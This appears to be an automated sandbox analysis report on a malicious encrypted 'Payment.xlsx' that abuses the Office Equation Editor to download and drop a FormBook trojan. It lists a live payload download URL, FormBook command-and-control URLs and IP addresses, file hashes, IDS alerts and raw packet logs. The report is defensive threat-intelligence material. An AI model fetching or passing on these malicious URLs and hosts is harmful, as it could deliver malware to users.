Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@14/8@7/7
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.1% (good quality ratio 25.8%)
• Quality average: 72.6%
• Quality standard deviation: 28.1%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 128
• Number of non-executed functions: 78
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:59:09 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
16:59:11 | API Interceptor | 144x Sleep call for process: vbc.exe modified
16:59:47 | API Interceptor | 217x Sleep call for process: NAPSTAT.EXE modified
17:00:17 | API Interceptor | 1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

                                                                                                                                                              kAO6QPQsZF.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ifdca.com/m0rc/?kfLlav=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otESCz2qCMY&gL=ybFLLT9hAnjhNt
                                                                                                                                                              yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.manconnectr.services/gts/?uDHXm=9IMft3k8F713VnQnF9zp3jMOr/Batv3t6t3TBX5Dnn3sWNexcE+V9+jLQfTIIs3IwpNq&8p=2dRTAnw8b
                                                                                                                                                              POWPO-201209-248-INV10981-PI100833-Waycos20210225.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.adigitaldemocracy.computer/smd0/?CBZpb=n0GxdzhhB&ZvaxiLAp=/m0nPq14FUGSlul8fJdZDW8lKKfn+gzot6xiXfOrt7ZYHXf83Wmhv0cqByGHV5dueqIwmg==
                                                                                                                                                              orDEANQA70mnjpD.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.thenonfictionauthor.com/kzl/?AdhDQXr=Gyn7/ty3DfyImuCS3aJAaEklGXzzwEUNFIImI8Z2ddRHRD+aqWZPG+GUA8BmTtk7xAZy1GghOw==&pP=EFQtiVMhhH5L
                                                                                                                                                              Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.chelseybalassi.com/pkfa/?kRm0q=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KBTtOUqpAtQ&P0D=AdpLplk
                                                                                                                                                              Smart Tankers Qoute no. 2210.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.localeastbay.com/xle/?LFQLRZ=E0pVt0SD/c6cjw8B7rNDtvuitkx+mv2nZsT+uLlUSSE0kMh9c3r1xcNAL16Y1e/bK4TSnA==&1brt=kvgpkNCXb4
                                                                                                                                                              NWvnpLrdx4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.pendekar-qq.xyz/da0a/?0pn=3idupu15OOeW9zfMjMdgut9mS0cjf15hkTqMaFLLCpXgHo77noPJVLOm8UPOedJyS0V+rQvXng==&D6Ap=ZfoTzbtx3ht
                                                                                                                                                              LbxEsmtt9T.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.winton.school/xle/?CRi=_DKdFjZ&b6=63sZlfPxpYub/3CVsezcfMIXyleq3IuiloyLDgT7uRWOzgoiAeet3YMsJrqLIatkyaHP
                                                                                                                                                              j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.accessible.legal/csv8/?R0G=dhrxP2v88TRtsx&Bz=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx+vzGuPbqxiE
                                                                                                                                                              ins.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.seak.xyz/uds2/?RZBxhprX=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpukeTtFbirQ9P&2dnDH=hpyPs2spXhIX0dH0
                                                                                                                                                              urgent specification request.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ido.lgbt/rbg/?XbfTxRJp=hIAXe7F1z8L2t8PUj0dDc1RC7hWn72SE/UIhq0x6lMU4/eENencvYGY83Ko+Mq4roz52&Ez=ltxdLDm
                                                                                                                                                              g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.doggybargains.com/nki/?-Z1l=TOQH/B74eY+lLUBsPfn02/AyeWt7NTM3T5MQ11peB6QiRzS5xhI/XYvznnh8++9i+D38b9u5AQ==&5ju=UlSpo
                                                                                                                                                              bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.melaninswagger.com/2bb/?QDK=LleDzhh0FB3X&JtO=JOwLIjZiq2GNu+Jzxas6FSG4+h7nxGCMl3lRW3DKuz7LNyZoo5mrJ0KVtcpv9YkCbORqSXqerA==

Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                              • 107.172.227.10
                                                                                                                                                              ABOVE-AS-APAboveNetCommunicationsTaiwanTW74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • 103.5.116.132
                                                                                                                                                              INTERQGMOInternetIncJPc647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • 157.7.44.172
                                                                                                                                                              bdc0c7d3_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.72
                                                                                                                                                              DHL_S390201.exeGet hashmaliciousBrowse
                                                                                                                                                              • 118.27.99.28
                                                                                                                                                              AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              SOA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.52.102
                                                                                                                                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              MrV6Do8tZr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              5PthEm83NG.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              k7AgZOwF4S.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              WGv1KTwWP5.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              qmhFLhRoEc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              uNttFPI36y.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              dw0Iro1gcR.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              NMpDBwHJP8.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              lfBVtTwPNQ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              Fax scanned 14-04-2021.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              INV#609-005.PDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 150.95.255.38
                                                                                                                                                              u87sEvt9v3.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.239.73
                                                                                                                                                              4oItdZkNOZ.exeGet hashmaliciousBrowse
                                                                                                                                                              • 163.44.185.226

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                              Reputation:low
                                                                                                                                                              IE Cache URL:http://will.kasraz.com/a/so.exe
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4BFD36.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B2ABFC3.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):653280
                                                                                                                                                              Entropy (8bit):2.8986392617606107
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3072:f34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:/4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                              MD5:08C97F7538AB65F8E3F78D0787C3AF7A
                                                                                                                                                              SHA1:C59A376CF9FE5B44D580891747B383DA724F144F
                                                                                                                                                              SHA-256:EF439381C92C42989797C8B0D7460791156C54AC7FC2BCD741FA6120DFBF80EA
                                                                                                                                                              SHA-512:E61BA4589BAF5BC714B1E16E36AA840FDD5E3BDA16C995D238D87D88299E29D964DB983A84FA726F3CC74C26105D44EF91074381E52D83F307B5D6EF72F759C6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):7337552
                                                                                                                                                              Entropy (8bit):1.6350000486784952
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:mhIww9GjS9WajgfUJt3hIww9GjS9WajgfUJtn:uw9Gkr9w9Gkrn
                                                                                                                                                              MD5:E43D498A7EE295C05D88E063BBB703BD
                                                                                                                                                              SHA1:5EB0D80A489A90AE5C650ACF1EDEB3DD95FA276E
                                                                                                                                                              SHA-256:483BCCB76820466FFFB1BB06D3436D7B79B48F600CCA539FD2F514120CD08D78
                                                                                                                                                              SHA-512:62211CDC58A2D4364077387C9E89C8782A1437FCB2C77C7FF378A8F2FD20C9E99550C4F520473C844EF8A5B5487E615834D7D839D54D57B86B5C1C148A2B2F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39E6EE8.emf
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5376
                                                                                                                                                              Entropy (8bit):5.0441612941917615
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:p2NmAZb6pvCa4ukzw+Lv6KbLSNRyBLf2qoCfVYIrxQ2PNrYJf66QpTIZTAo0zQnw:cUvZ0LbLSNR8L5oCNYdWN8M6QNcvBvPy
                                                                                                                                                              MD5:74DB540A0F8EADF65B6CA25FD6B93D18
                                                                                                                                                              SHA1:4E49830309156268990DAC2684DFA479764718FD
                                                                                                                                                              SHA-256:7D07D91D712C32A5E2D8F3EAF68649CF533573F7963E6BE9D834446908DA525E
                                                                                                                                                              SHA-512:572DF79363F7E2CB187C9024B9FFFB0D5168CE1227F7781E2BA056BA1B77800AE0E193CDE350021D70ACABA8B0E6CBE1A4D290817006B7F2C8B541EBC233D6CF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3E411C9.png
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):79394
                                                                                                                                                              Entropy (8bit):7.864111100215953
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                              MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                              SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                              SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                              SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                              C:\Users\user\Desktop\~$Payment.xlsx
                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):330
                                                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              C:\Users\Public\vbc.exe
                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):665600
                                                                                                                                                              Entropy (8bit):7.6258646097638785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:62gypDoyIcOKM5r2uA2rUaML6/tsXpeAr9rF2gRGnURucvUkgDavaijBCir:zgypPzOKp4tR/2XpeAr9rFvzu0Z4ir
                                                                                                                                                              MD5:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              SHA1:ACBCECF7599D3C33F6F2A36C0947CFC633D0A406
                                                                                                                                                              SHA-256:9E189D8D48A66D2F53C972275642DA7CBC8AD51B20F04CF1D592BEF360DB50CF
                                                                                                                                                              SHA-512:35E43A0F2EF1DD2DFAF921D8AF3A4F3EF0F4675479D496141358561C84A3B8C8B1A5BD9497FE6C26757D3E6637EDAB538AC587D73BC6D47E9B90B751ABF55BA3
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 13%

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:CDFV2 Encrypted
                                                                                                                                                              Entropy (8bit):7.98035578403973
                                                                                                                                                              TrID:
                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                              File name:Payment.xlsx
                                                                                                                                                              File size:1363456
                                                                                                                                                              MD5:05f49aa5b342dedd1d7b6673f3d8bc41
                                                                                                                                                              SHA1:9ca061b9851269f8b1d2fd990ebe119903a5f0fb
                                                                                                                                                              SHA256:3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
                                                                                                                                                              SHA512:dc296422a45c34721b0746b1b3b34581def5b69b081718e790d4ad75e9e67c6f1afd6a5197ee48fba9d1d7c574ac95a4797b29ad4b2bfc094580fffa78513f2b
                                                                                                                                                              SSDEEP:24576:iiOiNObhnSFbuLWFBMNbjlq2W6g4t0RH/UXOal6UKcv1eytV:LOi4hobc1P7/CC6LiUqV

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "Payment.xlsx"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:False
                                                                                                                                                              Application Name:unknown
                                                                                                                                                              Encrypted Document:True
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:64
                                                                                                                                                              Entropy:2.73637206947
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:112
                                                                                                                                                              Entropy:2.7597816111
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:200
                                                                                                                                                              Entropy:3.13335930328
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/Version
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:76
                                                                                                                                                              Entropy:2.79079600998
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 1333560
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptedPackage
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:1333560
                                                                                                                                                              Entropy:7.99982132167
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptionInfo
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:224
                                                                                                                                                              Entropy:4.45948973456
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . M . . U s T . . . l . e . . W . W . . . . . . . b 7 . . . . . . . . . C . . + + % a A . . . . . . . . . . . n ( . h . . . . . H . A

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/21-16:58:51.294439 | TCP | 3132 | WEB-CLIENT PNG large image width download attempt | 80 | 49167 | 192.3.122.177 | 192.168.2.22
05/04/21-17:00:20.875209 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 66.235.200.147
05/04/21-17:00:20.875209 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 66.235.200.147
05/04/21-17:00:20.875209 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 66.235.200.147

                                                                                                                                                              TCP Packets

                                                                                                                                                              May 4, 2021 16:58:51.154089928 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154102087 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154129028 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154355049 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154381037 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154405117 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154416084 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154433012 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.154462099 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.154489040 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156255007 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156284094 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156307936 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156336069 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156342030 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156368017 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156390905 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156407118 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156413078 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156415939 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156426907 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156441927 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156465054 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156466007 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156488895 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156490088 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156511068 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156522036 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156536102 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156548977 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156563044 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156575918 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156591892 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156614065 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156618118 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156637907 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156661034 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156662941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156667948 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156685114 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156689882 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156708002 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156717062 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156732082 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156755924 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156765938 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156781912 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156783104 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156806946 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156809092 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.156830072 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.156840086 CEST4916780192.168.2.22192.3.122.177
